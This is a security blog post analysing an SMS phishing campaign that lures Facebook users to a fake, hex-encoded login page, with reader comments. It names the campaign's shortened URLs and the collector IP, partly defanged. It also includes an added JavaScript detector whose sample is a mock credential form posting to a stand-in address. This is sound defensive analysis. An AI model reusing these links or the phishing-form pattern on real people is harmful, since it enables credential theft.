Update, 01 Sept 2014: NUMBERCOP, one of our blog readers, has tipped us off in the comments section that this particular scam has resurfaced with a new bit.ly URL, which was created on August 31, 2014, a couple of days ago. As of this writing, the number of visitors to that link seems to be increasing.
Original post:
If you happen to receive an SMS message from a potentially unknown sender with the following text—
wtf f***** remove this pic from Facebook. http://bit[dot]do/fbnudephotos
—much like the fellow on the screenshot above, then you’ve been targeted by a phishing campaign.
The bit.do link is the shortened URL for a publicly available HTML page hosted on a Dropbox account. It looks like this:
All links but one, the “Get Facebook for iPhone and browse faster.” link, lead to a 404 page. That one link leads to the actual iTunes app download page.
The full code of the page is actually hex encoded and executed by the unescape() function. Partial code looks like this once decoded by a free online tool:
Once users provide their Facebook credentials to the page, these are then posted to a .PHP page hosted on 193[dot]107[dot]17[dot]68, which we found out to be quite a popular location for hosting malware.
While this happens in the background, users are directed to the following screenshot, which serves as humour, if not a “Gotcha!” after a successful con.
Another thing of note is the bit.ly URL at the bottom of the code:
This is a shortened URL for what we believe is a page that was once a diet scam page, judging from the actual URL string we have encountered before:
We suspect that this bit.ly URL is included to increase the click-through rate or visits to the page.
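The hex-encoded markup and the off-site form target described above can be checked without running the page. The following is an added example, not code from the original post: it decodes the arguments of unescape() calls as plain text and lists where any form would post. The function names, the constructed sample page and its 192.0.2.10 documentation address are assumptions made for illustration.

```javascript
// Added example: static triage of a page hidden behind unescape('%3C...').
// Nothing from the analysed page is executed; it is only decoded as text.

// Same decoding the legacy unescape() performs: %XX and %uXXXX escapes.
function decodeEscapes(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Collect every string literal passed to unescape(), following nested layers.
// Limitation: literals built by concatenation are not reassembled.
function decodeLayers(html, maxDepth = 5) {
  const layers = [];
  let pending = [html];
  for (let d = 0; d < maxDepth && pending.length; d++) {
    pending = pending.flatMap(text =>
      [...text.matchAll(/unescape\s*\(\s*(["'])(.*?)\1\s*\)/gis)].map(m => decodeEscapes(m[2])));
    layers.push(...pending);
  }
  return layers;
}

// List form targets and flag hosts that are raw IPs or outside expectedDomain.
function formTargets(markup, expectedDomain = 'facebook.com') {
  const out = [];
  for (const m of markup.matchAll(/<form\b[^>]*\baction\s*=\s*["']?([^"'\s>]+)/gi)) {
    let host = null;
    try { host = new URL(m[1]).hostname.toLowerCase(); } catch { /* relative URL */ }
    const onDomain = host === expectedDomain || (host || '').endsWith('.' + expectedDomain);
    out.push({ action: m[1], host,
      rawIp: /^\d{1,3}(\.\d{1,3}){3}$/.test(host || ''),
      offDomain: host !== null && !onDomain });
  }
  return out;
}

// Scan the raw page and every decoded layer for form targets.
function analysePage(html, expectedDomain = 'facebook.com') {
  return [html, ...decodeLayers(html)].flatMap(t => formTargets(t, expectedDomain));
}

// Constructed sample (not the real page): a form hex-encoded the same way,
// posting to a documentation-range address (192.0.2.10).
const clear = '<form method="post" action="http://192.0.2.10/post.php">' +
  '<input name="email"><input name="pass" type="password"></form>';
const samplePage = "<script>document.write(unescape ('" +
  [...clear].map(c => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('') +
  "'));</script>";
console.log(analysePage(samplePage));
```

A form target flagged as both rawIp and offDomain on a page that imitates a login screen is the pattern this post describes.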
Individuals or groups with bad intent have been using SMS as a way to scam people, either for their money or for their information.
Senior Security Researcher Jérôme Segura published a post entitled “SMS Scams: How To Defend Yourself” back in 2013, which I recommend you, dear Reader, read as well. His thoughts on this kind of fraud remain relevant to this date.
Other related post/s:
- Uncovering an Android botnet involved in SMS fraud
- Mobile Top-Up Credit Sharing Scams in Circulation
- SMS Activated Flash Downloads: A Digital Leap of Faith
- Porn on YouTube Leads to Premium-Rate SMS Scams
Jovi Umawing
Great analysis! We’ve been tracking this smishing campaign for about 2 weeks. Other associated domains included http://goo[dot]gl/qP13YS and http://goo[dot]gl/SnF9Hz . Awkward traffic patterns on this campaign too. Very untypical for smishing campaigns. We’re tracking 2 dozen outbound numbers via Level3. This is possibly mobile malware/bot driven.
Thanks for the comment and insights 🙂 I, too, look forward to your research on this similar matter and others. They’re interesting and I’d like to learn more.
Not necessarily directly related to the topic, but I love what you guys are doing. Protecting digital safety is very important. Internet streets need to be protected just as much as the city streets.
Thank you, Iona 🙂 Please keep checking back to the blog to keep yourself informed!